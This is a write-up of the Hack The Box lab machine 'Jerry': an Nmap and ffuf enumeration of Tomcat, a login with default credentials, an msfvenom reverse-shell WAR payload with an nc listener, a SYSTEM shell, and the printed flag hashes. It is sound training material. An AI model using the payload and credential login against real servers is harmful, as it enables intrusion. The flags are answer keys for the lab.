HTB — Jerry
What do you say, Tom, can you catch me?
Starting with an Nmap scan we find 1 open port
# Nmap 7.93 scan initiated Wed Jan 24 01:18:54 2024 as: nmap -sV -sC -Pn -p 8080 -o nmap.txt jerry.htb
Nmap scan report for jerry.htb (10.129.145.195)
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Wed Jan 24 01:19:06 2024 -- 1 IP address (1 host up) scanned in 12.54 seconds
Let’s try and see if the currently installed version of Apache Tomcat is vulnerable
$searchsploit Tomcat 7.0.88
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Fuzzing the address gave us a few directories to look at
$./ffuf -w /usr/share/wordlists/dirb/big.txt -u <http://jerry.htb:8080/FUZZ> -o ../fuzzed.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : <http://jerry.htb:8080/FUZZ>
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Output file : ../fuzzed.txt
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
docs [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
examples [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
favicon.ico [Status: 200, Size: 21630, Words: 19, Lines: 22, Duration: 107ms]
lpt1 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 99ms]
lpt2 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 100ms]
manager [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 98ms]
nul [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
prn [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 114ms]
:: Progress: [20469/20469] :: Job [1/1] :: 395 req/sec :: Duration: [0:00:54] :: Errors: 0 ::
The /manager
directory seems interesting and perhaps we can use some default credentials to login. In this case we can try using the username:password combination of tomcat:s3cret
to try and login to the management webapp.
Once inside we see an upload section which we can use to our advantage, but we can only upload WAR files so let’s craft a payload for it which you can find here
For simplicity's sake the line we are looking for is this:
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
Now all we have to do is upload our payload and start the listener in our terminal using netcat:
nc -lvnp <LPORT>
And with that we get a shell as authority\system on the machine
$ nc -lvnp 4444
Ncat: Version 7.93 ( <https://nmap.org/ncat> )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.154.214.
Ncat: Connection from 10.129.154.214:49192.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\\apache-tomcat-7.0.88>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\\apache-tomcat-7.0.88
06/19/2018 03:07 AM <DIR> .
06/19/2018 03:07 AM <DIR> ..
06/19/2018 03:06 AM <DIR> bin
06/19/2018 05:47 AM <DIR> conf
06/19/2018 03:06 AM <DIR> lib
05/07/2018 01:16 PM 57,896 LICENSE
01/25/2024 10:26 PM <DIR> logs
05/07/2018 01:16 PM 1,275 NOTICE
05/07/2018 01:16 PM 9,600 RELEASE-NOTES
05/07/2018 01:16 PM 17,454 RUNNING.txt
06/19/2018 03:06 AM <DIR> temp
01/25/2024 10:38 PM <DIR> webapps
06/19/2018 03:34 AM <DIR> work
4 File(s) 86,225 bytes
9 Dir(s) 2,420,121,600 bytes free
C:\\apache-tomcat-7.0.88>whoami
whoami
nt authority\\system
All that’s left is to find the flags which you can find in the Administrator Desktop folder which would finish this machine
C:\\Users\\Administrator\\Desktop\\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e